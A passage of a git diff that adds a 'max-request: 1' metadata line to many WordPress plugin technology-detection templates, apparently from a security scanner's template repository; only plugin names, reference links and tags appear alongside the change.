b/http/technologies/wordpress/plugins/loco-translate.yaml index 3f141c4476..dfcaf6f71b 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: + max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 5355e988a2..61be246fee 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: + max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index 6f06b49011..1c16a72d76 100644 --- a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginpress/ metadata: + max-request: 1 plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 53d409fb68..50d2e6630b 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 0e908a9580..8d71f7bde9 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index aeb1875c57..5e1f97086e 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: + max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 7c15702305..d87d456a8c 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: + max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 5ce87e6c71..aa9153241e 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: + max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index c342e6b45a..09641796a3 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: + max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index e95041f555..28b70d09bf 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: + max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 879a0d1c12..b43c10ed7a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: + max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 985f5d373a..eb7e78bc7f 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: + max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 8e1cb46cf0..8881e23860 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: + max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7e3e4e2d7e..7a58c58f63 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: + max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 17ea142c46..5f99b8cac8 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: + max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 953e4ab3d8..b08876df04 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: + max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 92107fa69c..3f68dffe06 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: + max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5e1fe4ef5c..34f9bde1d6 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: + max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 74fb3e6010..d9f645328f 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: + max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index b9f70ba555..8a1196fc9f 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: + max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 6486c02c9a..05025452b7 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: + max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index c45ef4bf89..0bc823830f 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: + max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 3743307dbc..dafe6974f6 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: + max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index a4c6980041..ba05fb1e16 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: + max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/photo-gallery.yaml b/http/technologies/wordpress/plugins/photo-gallery.yaml index a224d85727..7fbeea5917 100644 --- a/http/technologies/wordpress/plugins/photo-gallery.yaml +++ b/http/technologies/wordpress/plugins/photo-gallery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/photo-gallery/ metadata: + max-request: 1 plugin_namespace: photo-gallery wpscan: https://wpscan.com/plugin/photo-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index adf3387ddb..7f98d822a8 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: + max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index eb6e1aaa5d..89602f4264 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: + max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index b3c83cd0bf..2f6513ca42 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: + max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 96d8bd6aca..982306b13c 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: + max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 85955ac95e..fdcac13b56 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: + max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 56d2e4efcd..829edad042 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: + max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index d9c6052cd7..975b63f5de 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: + max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index afc1141e0c..5065659e82 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: + max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index d44add9ca6..732ffbc4eb 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: + max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 20ba5c2e16..12dffeb534 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: + max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index cbcf3cf09d..ae0e76c4bb 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: + max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 3311d42c94..b1718d1ccb 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: + max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 46c1c22805..7543ac1d55 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 7c13b8d2a4..4a29cecdb0 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: + max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 53b30ba721..be281d91e6 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: + max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 9555d7aebd..6bd95ec077 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: + max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 180266f448..1fd64a5279 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: + max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 656ad7dfe5..648ee176ce 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: + max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 015fb97043..7836d9554c 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: + max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 1d5224b457..ccd72e427a 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: + max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index aafd6c6a38..3622b2c6b3 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: + max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e10ab985da..9eff765d61 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: + max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 9881b591ae..c856e1fa9e 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: + max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 0480b4b0e6..008440cc58 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: + max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 26d525386b..410776862f 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: + max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 3920c5cf56..f210a2a2f9 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: + max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f556786f5a..f1dd1bf150 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: + max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 844e3d19a0..a9ec913599 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: + max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index eb0f02f602..d38aeb0279 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: + max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 755efd53fa..07c43b9d80 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: + max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 0403bb4e72..83a849e11e 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: + max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index cd2632ea05..c6100637d9 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: + max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index b5f8b822c7..1f188b66c6 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: + max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git 